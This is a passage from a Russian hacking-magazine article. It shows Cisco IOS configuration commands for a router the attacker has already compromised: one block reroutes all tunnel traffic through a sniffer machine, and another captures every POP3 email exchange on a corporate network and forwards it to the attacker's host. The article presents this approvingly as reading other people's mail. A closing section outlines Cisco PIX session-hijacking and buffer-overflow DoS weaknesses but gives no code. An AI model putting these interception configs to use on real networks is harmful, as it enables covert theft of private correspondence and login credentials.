Укрощение дикой киски

Street (streetseeker@mail.ru)

Хакер, номер #071, стр. 071-068-3

Однако я описал только одну возможную схему атаки, которую и применял. Сейчас я покажу, как можно было добиться такого же результата при помощи другой схемы:

conf t

access-list 100 permit ip any any

route-map send-traffic-in

match ip address 100

set ip next-hop ip_sniffera

exit

int tunnel0

ip policy route-map send-traffic-in

exit

route-map send-traffic-out

match ip address 100

set ip next-hop ip_tunnela_zhertvi

exit

int eth0/0

ip policy route-map send-traffic-out

exit

exit

Карта маршрутизации send-traffic-in применяется к интерфейсу туннеля tunnel0. Это перенаправляет весь трафик, прибывающий из туннеля, к тачке-снифферу. Комп форвардит трафик назад, на атакующий роутер, который, принимая траф, тут же футболит его на конечную точку туннеля - к жертве.

Читать чужие письма плохо?

Предположим, тебя интересует корреспонденция внутри корпоративной локалки. Сервак для доступа требует авторизации, а инфа очень важна. В таком случае можно задать, какой именно трафик тебя интересует. Скажем, если ты хочешь тянуть весь pop3-траф, тогда в консоли захваченного роутера забей следующее:

conf t

access-list 101 permit tcp any any eq 110

access-list 101 permit tcp any eq 110 any

exit

Этот аксесс-лист подходит ко всему pop3-трафику. Необходимо обозначить правила для входящего и исходящего трафика, т.к. этот аксесс-лист будет использоваться в картах маршрутизации для обоих интерфейсов атакуемого роутера. Далее:

conf t

route-map cap-traf

match ip adress 101

set ip next-hop ip_attackera

exit

int eth0

ip policy route-map cap-traf

exit

int eth1

ip policy route-map cap-traf

exit

exit

Карта маршрутизации cap-traf берет весь трафик, соответствующий аксесс-листу 101, и форвардит его на атакующий роутер по GRE-туннелю. Эта карта маршрутизации применяется как к внешнему, так и ко внутреннему интерфейсу роутера. Теперь весь pop3-трафик сниффится, отправляется обратно, и в итоге мы имеем довольного кибер-вуайериста :).

Укрощение дикой киски

Следуя старой доброй традиции, я расскажу тебя напоследок о веселом баге в Cisco PIX. Cisco PIX - это встроенный файрвол, который позволяет реализовать VPN, IPSec и прочие не менее полезные в плане безопасности фичи. Однако в последнее время в нем было найдено столько дырок, что он вполне может претендовать на звание «Дуршлаг года» (после MS Windows и MS IE, разумеется).

Первое: в ходе начального обмена сообщениями PIX не может удалить вторичный (сейчас последует большой геморроидальный узел =)) Internet Security Authentication Key Management Protocol Security Associations (ISAKMP SAs). То бишь когда клиент устанавливает успешную VPN-сессию с маршрутизатором, PIX создает пресловутый ISAKMP SA, ассоциированный с юзером и его IP-адресом. Если атакующий может блокировать соединение авторизированного пользователя и по IP-адресу этого пользователя соединиться с PIX-ом, то ему будет доступна и VPN-сессия, правда, только в том случае, если он изловчился и уже получил PSK - pre-shared key. Все это есть не более чем банальный захват сеанса плюс спуфинг. Шоссе для MITM-атак. Помимо этого, в ходе HTTP-аутентификации с RADIUS-сервером можно провести DoS-атаку, используя переполнение буфера.